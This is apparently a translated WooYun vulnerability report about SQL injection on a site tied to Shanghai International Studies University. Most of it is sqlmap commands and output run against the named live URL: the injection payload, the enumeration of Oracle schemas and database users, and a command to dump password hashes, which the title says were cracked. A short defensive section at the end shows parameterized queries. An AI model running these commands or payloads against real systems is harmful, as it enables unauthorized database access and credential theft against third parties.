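2016-01-27: Details reported to the vendor; waiting for the vendor to handle them
2016-02-01: The vendor chose to ignore the vulnerability; details disclosed to the public
As titled: SQL injection on a Shanghai International Studies University site (hashes cracked)
While testing, I found that a Shanghai International Studies University site has an injection. The injection point is http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202
Run sqlmap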
➜~» sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --dbs --batch [22:00:22]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:00:30
[22:00:30] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file
[22:00:30] [INFO] resuming injection data from session file
[22:00:30] [INFO] resuming back-end DBMS 'oracle' from session file
[22:00:31] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: activity.id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT
---
[22:00:32] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[22:00:32] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[22:00:32] [INFO] fetching database (schema) names
[22:00:32] [INFO] fetching number of databases
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': 16
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': CTXSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DBSNMP
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': EXFSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OLAPSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OUTLN
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SCOTT
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SWPX
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSMAN
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSTEM
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': TSMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': WMSYS
[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': XDB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SWPX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[22:00:32] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'
[*] shutting down at: 22:00:32
Enumerate users
sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --users --batch [22:00:32]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:00:41
[22:00:41] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file
[22:00:41] [INFO] resuming injection data from session file
[22:00:41] [INFO] resuming back-end DBMS 'oracle' from session file
[22:00:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: activity.id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT
---
[22:00:41] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[22:00:41] [INFO] fetching database users
[22:00:41] [INFO] fetching number of database users
[22:00:41] [INFO] retrieved: 22
[22:00:50] [INFO] retrieved: SWPX
[22:01:13] [INFO] retrieved: SCOTT
[22:01:44] [INFO] retrieved: MGMT_VIEW
[22:02:26] [INFO] retrieved: MDDATA
[22:03:07] [INFO] retrieved: SYSMAN
[22:03:47] [INFO] retrieved: MDSYS
[22:04:16] [INFO] retrieved: SI_INFORMTN_SCHEMA
[22:05:38] [INFO] retrieved: ORDPLUGINS
[22:06:21] [INFO] retrieved: ORDSYS
[22:06:38] [INFO] retrieved: OLAPSYS
[22:07:03] [INFO] retrieved: ANONYMOUS
[22:07:36] [INFO] retrieved: XDB
[22:07:53] [INFO] retrieved: CTXSYS
[22:08:20] [INFO] retrieved: EXFSYS
[22:08:39] [INFO] retrieved: WMSYS
[22:08:59] [INFO] retrieved: DBSNMP
[22:09:23] [INFO] retrieved: TSMSYS
[22:09:52] [INFO] retrieved: DMSYS
[22:10:08] [INFO] retrieved: DIP
[22:10:26] [INFO] retrieved: OUTLN
[22:10:56] [INFO] retrieved: SYSTEM
[22:11:23] [INFO] retrieved: SYS
database management system users [22]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SWPX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[22:11:34] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'
Enumerate passwords
sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --password --batch [22:11:34]
That's it.
fix issue
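An added example, not part of the original report: the payload in the sqlmap output closes a quoted literal, which indicates that activity.id is concatenated into the SQL string. The sketch below uses Python's sqlite3 as a stand-in for the site's JSP/Oracle stack (the table, columns and function names are assumptions) and puts the concatenated lookup next to a validated, bound one.

```python
import sqlite3

# Payload string exactly as printed in the sqlmap output above.
PAYLOAD = "202' AND 3416=3416 AND 'euuT'='euuT"


def make_db():
    # Constructed stand-in table; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE activity (id TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO activity VALUES ('202', 'constructed sample row')")
    return db


def lookup_concat(db, activity_id):
    # 'Before' form: the value is pasted inside a quoted literal, so a quote
    # in the value ends the literal and the remainder is parsed as SQL.
    sql = "SELECT title FROM activity WHERE id = '" + activity_id + "'"
    return db.execute(sql).fetchone()


def lookup_bound(db, activity_id, validate=True):
    # Hardened form: allow-list the expected shape, then bind the value so
    # the driver never parses it as SQL text.
    if validate:
        ok = activity_id.isascii() and activity_id.isdigit()
        if not ok or len(activity_id) > 10:
            raise ValueError("activity.id must be a short decimal number")
    sql = "SELECT title FROM activity WHERE id = ?"
    return db.execute(sql, (activity_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Concatenation: the injected condition is evaluated by the database, so
    # the page differs between a true and a false condition.
    print(lookup_concat(db, PAYLOAD))
    print(lookup_concat(db, PAYLOAD.replace("3416=3416", "3416=3417")))
    # Binding alone: the whole string is compared as a literal id, no match.
    print(lookup_bound(db, PAYLOAD, validate=False))
    # Validation plus binding: the request is rejected before any query runs.
    try:
        lookup_bound(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

In the Java stack named in the output, the equivalent is a PreparedStatement with a bound parameter, or a named parameter in the ORM query, instead of string concatenation.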
Severity: no impact (ignored by vendor)
Ignored at: 2016-02-01 09:50
Vulnerability Rank: 4 (WooYun rating)
None yet